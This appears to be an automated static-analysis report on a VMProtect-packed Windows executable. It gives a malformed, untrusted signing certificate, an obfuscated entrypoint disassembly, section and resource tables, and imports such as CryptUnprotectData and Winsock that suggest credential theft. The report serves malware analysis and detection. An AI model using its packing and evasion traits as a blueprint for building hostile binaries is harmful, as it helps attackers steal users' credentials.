\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbe"
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	28/04/2024 12:30:20 29/04/2034 12:30:20
Subject Chain	CN="J=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbeJ=\xac\xf2\xe2\xfa0\xb8D\u2022\xda@\u0178\xbe"
Version:	3
Thumbprint MD5:	461E0E83D2CB61127CE6FDE43550A3C4
Thumbprint SHA-1:	D1D8DFAE87F7DE8A7DBAD1911FE06F3818370340
Thumbprint SHA-256:	2C4B5D5D35C677AB881F09B6D55BD151B72DA631C8D788D3D8CB33AEE1B5483F
Serial:	4A00210FE2A74EA0423A273A72172C06

Entrypoint Preview

Instruction
push ecx
mov ecx, F53BA637h
pushfd
neg cl
lea ecx, dword ptr [ecx+ecx*8+551BD530h]
and cx, 32A5h
not cx
not ecx
push edx
mov ecx, dword ptr [esp+08h]
mov dword ptr [esp+08h], 340224DCh
push dword ptr [esp+04h]
popfd
lea esp, dword ptr [esp+08h]
call 00007F3F686CBA67h
mov edi, 7DA9D8AEh
mov eax, dword ptr [edi+ebp-7DA9D8AEh]
jmp 00007F3F68C48B44h
push 5911F900h
not di
push 0D9D7921h
push C03F5889h
mov word ptr [esi], di
lea esp, dword ptr [esp+10h]
jmp 00007F3F687D2677h
push 5EA16492h
push B8A78CADh
lea esp, dword ptr [esp+1Ch]
jmp 00007F3F68694DB4h
mov dword ptr [esp+04h], B7B9932Ah
shld esi, edx, cl
jmp 00007F3F686AD428h
mov dword ptr [esp+00h], 0132CD83h
call 00007F3F6869952Dh
mov eax, dword ptr [esi]
mov edx, 1DA9992Bh
mov ecx, edx
dec edx
mov edx, dword ptr [edx+esi-1DA99926h]
and cx, cx
rol cl, FFFFFF81h
mov cl, byte ptr [ecx+esi-1DA9994Eh]
call 00007F3F687E65F5h
mov ecx, 8D1564B3h
mov edx, dword ptr [esi]
rol ecx, FFFFFF9Ah
imul ecx, ecx
mov cl, byte ptr [esi+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f5550	0x140	.vmp
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaba000	0xd5f0e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6a4a00	0x6118	.vmp
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xab8000	0x1ad0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa14ba8	0x18	.vmp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xab6790	0x40	.vmp
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4ea000	0x8c	.vmp
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xa893e4	0x40	.vmp
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x15bae8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15d000	0x27e32	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x185000	0x4930	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp	0x18a000	0x35f3ec	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp	0x4ea000	0x72c	0x800	c37a20b68b2724a434bf4440e28949e8	False	0.05810546875	data	0.35902399481160896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp	0x4eb000	0x5cc040	0x5cc200	988bca6770f9b3387e4262bcef992993	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0xab8000	0x1ad0	0x1c00	2854703eae0b0795488bd1d07ee4c8d2	False	0.3960658482142857	data	5.844831921963919	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xaba000	0xd5f0e	0xd6000	56d844bad305d8d2c391f1a87521cb29	False	0.868000921801986	data	7.779763654273746	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
TYPELIB	0xaba25c	0xc4588	Zip archive data, at least v1.0 to extract, compression method=store	0.867269643585433
RT_ICON	0xb7e7e4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.6648936170212766
RT_ICON	0xb7ec4c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.4924953095684803
RT_ICON	0xb7fcf4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.41898340248962657
RT_ICON	0xb8229c	0xd5d8	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	1.0002009352623118
RT_GROUP_ICON	0xb8f874	0x3e	data	0.7903225806451613
RT_VERSION	0xb8f8b4	0x3ec	data	0.44223107569721115
RT_MANIFEST	0xb8fca0	0x26e	ASCII text, with CRLF line terminators	0.5176848874598071

Imports

DLL	Import
KERNEL32.dll	GetVersionExA
USER32.dll	wsprintfA
GDI32.dll	CreateCompatibleBitmap
ADVAPI32.dll	RegQueryValueExA
SHELL32.dll	ShellExecuteA
ole32.dll	CoInitialize
WS2_32.dll	WSAStartup
CRYPT32.dll	CryptUnprotectData
SHLWAPI.dll	PathFindExtensionA
